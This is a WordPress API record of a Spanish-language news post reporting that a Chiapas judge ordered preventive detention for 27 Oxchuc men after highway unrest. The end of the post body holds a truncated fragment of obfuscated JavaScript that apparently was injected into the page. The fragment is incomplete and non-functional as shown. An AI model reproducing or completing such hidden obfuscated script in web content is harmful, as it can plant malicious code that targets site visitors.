{"id":4569,"date":"2022-08-22T00:13:43","date_gmt":"2022-08-22T00:13:43","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4569"},"modified":"2022-08-22T00:13:43","modified_gmt":"2022-08-22T00:13:43","slug":"determina-poder-judicial-prision-preventiva-a-grupo-de-personas-por-incidentes-en-la-via-chiapa-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4569","title":{"rendered":"Determina Poder Judicial, Prisi\u00f3n Preventiva a grupo de personas por incidentes en la v\u00eda Chiapa-SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-21-at-5.41.01-PM-1024x682.jpeg\" alt=\"\" class=\"wp-image-4570\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-21-at-5.41.01-PM-1024x682.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-21-at-5.41.01-PM-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-21-at-5.41.01-PM-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-21-at-5.41.01-PM-1536x1023.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-21-at-5.41.01-PM-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-21-at-5.41.01-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Tuxtla Guti\u00e9rrez.- A solicitud de la Fiscal\u00eda General del Estado, un juez del Poder Judicial del Estado de Chiapas, realiz\u00f3 una Audiencia de Control mediante la cual determin\u00f3 la Legal Detenci\u00f3n y Prisi\u00f3n Preventiva Justificada, de un grupo de personas como presuntos responsables de incidentes cometidos en las inmediaciones de la autopista Chiapa de Corzo- San Crist\u00f3bal de Las Casas.<\/p>\n\n\n\n<p>En la Audiencia, desarrollada bajo protocolos de respeto a los Derechos Humanos y con estricto apego a Derecho, la autoridad jurisdiccional atendi\u00f3 dos causas penales, una integrada por 14 y otra por 13 personas, determinando en ambos casos la Ampliaci\u00f3n de T\u00e9rmino por 144 horas, acordando nueva fecha para continuar con la Audiencia.<\/p>\n\n\n\n<p>Se trata un total de 27 habitantes de Oxchuc, de sexo masculino, mayores de edad que seg\u00fan el Ministerio P\u00fablico ser\u00edan presuntos responsables de los delitos de: Mot\u00edn y Atentados contra La Paz y la Integridad Corporal y Patrimonial de la Colectividad y del Estado, suscitados el pasado 19 de agosto en la zona carretera de Chiapa de Corzo.<\/p>\n\n\n\n<p>Con estas acciones, el Poder Judicial del Estado de Chiapas rarifica su compromiso con la legalidad y la impartici\u00f3n de justicia en beneficio de todas y todos los chiapanecos.<\/p>\n\n\n\n<p>Direcci\u00f3n de Comunicaci\u00f3n Social&nbsp;<\/p>\n\n\n\n<p>y Relaciones P\u00fablicas<\/p>\n\n\n\n<p>61 7 87 00 Ext. 8020\/8021&nbsp;f&nbsp;<\/p>\n\n\n\n<p>: \/poderjudicial.chiapas&nbsp;t&nbsp;<\/p>\n\n\n\n<p>: @PJE_Chiapas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Tuxtla Guti\u00e9rrez.- A solicitud de la Fiscal\u00eda General del Estado, un juez del Poder Judicial del Estado de Chiapas, realiz\u00f3 una Audiencia de Control mediante la cual determin\u00f3 la Legal Detenci\u00f3n y Prisi\u00f3n Preventiva Justificada, de un grupo de personas como presuntos responsables de incidentes cometidos en las inmediaciones de la autopista Chiapa de Corzo- &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4570,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-4569","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4569","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4569"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4569\/revisions"}],"predecessor-version":[{"id":4571,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4569\/revisions\/4571"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4570"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4569"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4569"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4569"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}